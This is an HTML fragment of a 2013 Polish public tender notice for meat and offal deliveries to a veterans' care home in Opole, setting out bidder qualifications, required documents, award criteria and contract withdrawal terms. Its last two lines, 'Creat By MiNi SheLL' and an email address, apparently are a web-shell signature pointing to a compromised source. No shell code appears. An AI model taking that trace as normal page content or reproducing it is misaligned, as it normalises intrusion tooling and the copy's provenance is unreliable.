wieprzowego wołowego i 	drobiowego i  ich przetworów , oraz podrobów   na  kwotę co najmniej 120 000 zł 	brutto z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz 	załączeniem dokumentu 	potwierdzającego, że dostawy zostały wykonane należycie lub 	są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach o których mowa w art.22 ust.1 pkt 3 ustawy Pzp. zamawiający żąda oświadczenia o braku podstaw do wykluczenia Wykonawcy z postępowania zgodnie z wzorem  oświadczenia stanowiącego załącznik do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach o których mowa w art.22 ust.1 pkt 3 ustawy Pzp. zamawiający żąda oświadczenia o braku podstaw do wykluczenia Wykonawcy z postępowania zgodnie z wzorem  oświadczenia stanowiącego załącznik do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie złożonego oświadczenia o 	spełnianiu 	warunków określonych w art.22 ust.1
	W celu wykazania braku podstaw  do wykluczenia z postępowania o udzielenie zamówienia 	Wykonawcy w okolicznościach, o których mowa w art. 22 ust.1 pkt 4 ustawy Pzp. 	Zamawiający żąda oświadczenia o braku podstaw do wykluczenia Wykonawcy z 	postępowania, zgodnie ze wzorem (propozycją ) oświadczenia  stanowiącym załącznik  do 	 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający, przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty  zgodnie z art.144 ust.1 ustawy PZP, w następujących przypadkach:
	1)  zmiany cen jednostkowych przedmiotu zamówienia w przypadku urzędowej zmiany stawki 	podatku VAT,
	2) zmiany cen jednostkowych przedmiotu zamówienia w przypadku urzędowej zmiany stawki 	podatku akcyzowego,
	3) w przypadku braku środków na realizację zadania lub wystąpienia innych nie przewidzianych
	przyczyn Zamawiający dopuszcza możliwość przesunięcia w formie aneksu do umowy 	ostatecznego terminu realizacji przedmiotu umowy lub rezygnacji z części dostaw.
	Wszelkie zmiany wymagają zgody obu stron i formy pisemnej w postaci aneksu pod rygorem 	nieważności publicznym czego nie można było przewidzieć w chwili zawarcia umowy, 	Zamawiający może odstąpić  od umowy w terminie miesiąca od powzięcia wiadomości o 	powyższych okolicznościach. Dopuszcza się zastosowanie innej stawki i wysokości 	należnego podatku VAT w przypadku zmiany obowiązujących w tym zakresie przepisów.

Poza przypadkiem o którym mowa wyżej stronom przysługuje prawo odstąpienia od umowy w następujących sytuacjach: 										1. Zamawiającemu  przysługuje prawo odstąpienia od umowy, gdy
		a)  zostanie ogłoszona upadłość Wykonawcy, zostanie wszczęta procedura 			likwidacji Wykonawcy lub Wykonawca zakończy prowadzenie działalności 
		b) w przypadku wszczęcia  postępowania egzekucyjnego, skierowanego do 			majątku Wykonawcy,
		c) Wykonawca nie rozpoczął realizacji przedmiotu umowy bez uzasadnionych 			przyczyn, oraz  nie kontynuuje jej mimo pisemnego wezwania Zamawiającego.
		d) w razie dostarczenia przez Wykonawcę asortymentu o parametrach  				niezgodnych z wymaganiami  określonymi  przez Zamawiającego w SIWZ  w 			szczególności  opisanych w formularzy rzeczowo - cenowym , lub w przypadku 		niedokonania przez Wykonawcę wymiany asortymentu , dostarczanego 				niezgodnie z z wymaganiami Zamawiającego   w terminie. trzech  godzin  			liczonych  od przyjęcia reklamacji przez Wykonawcę .
		e) w razie dostarczenia asortymentu pochodzącego od innego producenta - 			niedeklarowanego w Ofercie przez Wykonawcę.
		f)  W przypadku nie  wywiązania się  przez Wykonawcę z dysponowania 			środkami  transportu,  które  muszą być zgodne  z wymogami określonymi w 			Ustawie z dnia 25.08.2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 			2006 r. nr 171 poz. 1225)  to Zamawiającemu przysługuje prawo rozwiązania 			umowy w każdym czasie jej trwania ze  skutkiem natychmiastowym i 				zastosowania sankcji  z umowy z winy Wykonawcy. 
2. W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym,  czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiające może odstąpić od umowy w terminie miesiąca od powzięcia wiadomości o powyższych okolicznościach. W takim przypadku Wykonawca może żądać jedynie wynagrodzenia należnego z tytułu  wykonania części umowy.
3. Odstąpienie od umowy może nastąpić wyłącznie w formie pisemnej pod rygorem nieważności .
4. Wykonawcy przysługuje prawo odstąpienia od umowy, jeżeli:  Zamawiający nie wywiązuje się z obowiązku zapłaty faktur w terminie 4 tygodni od dnia, w którym upłynął termin zapłaty określony w  umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dps.opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej dla Kombatantów w Opolu  ul. Chmielowicka 6,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.01.2013 godzina 11:30, miejsce: Dom Pomocy Społecznej dla Kombatantów w Opolu  ul. Chmielowicka 6,  sekretariat parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com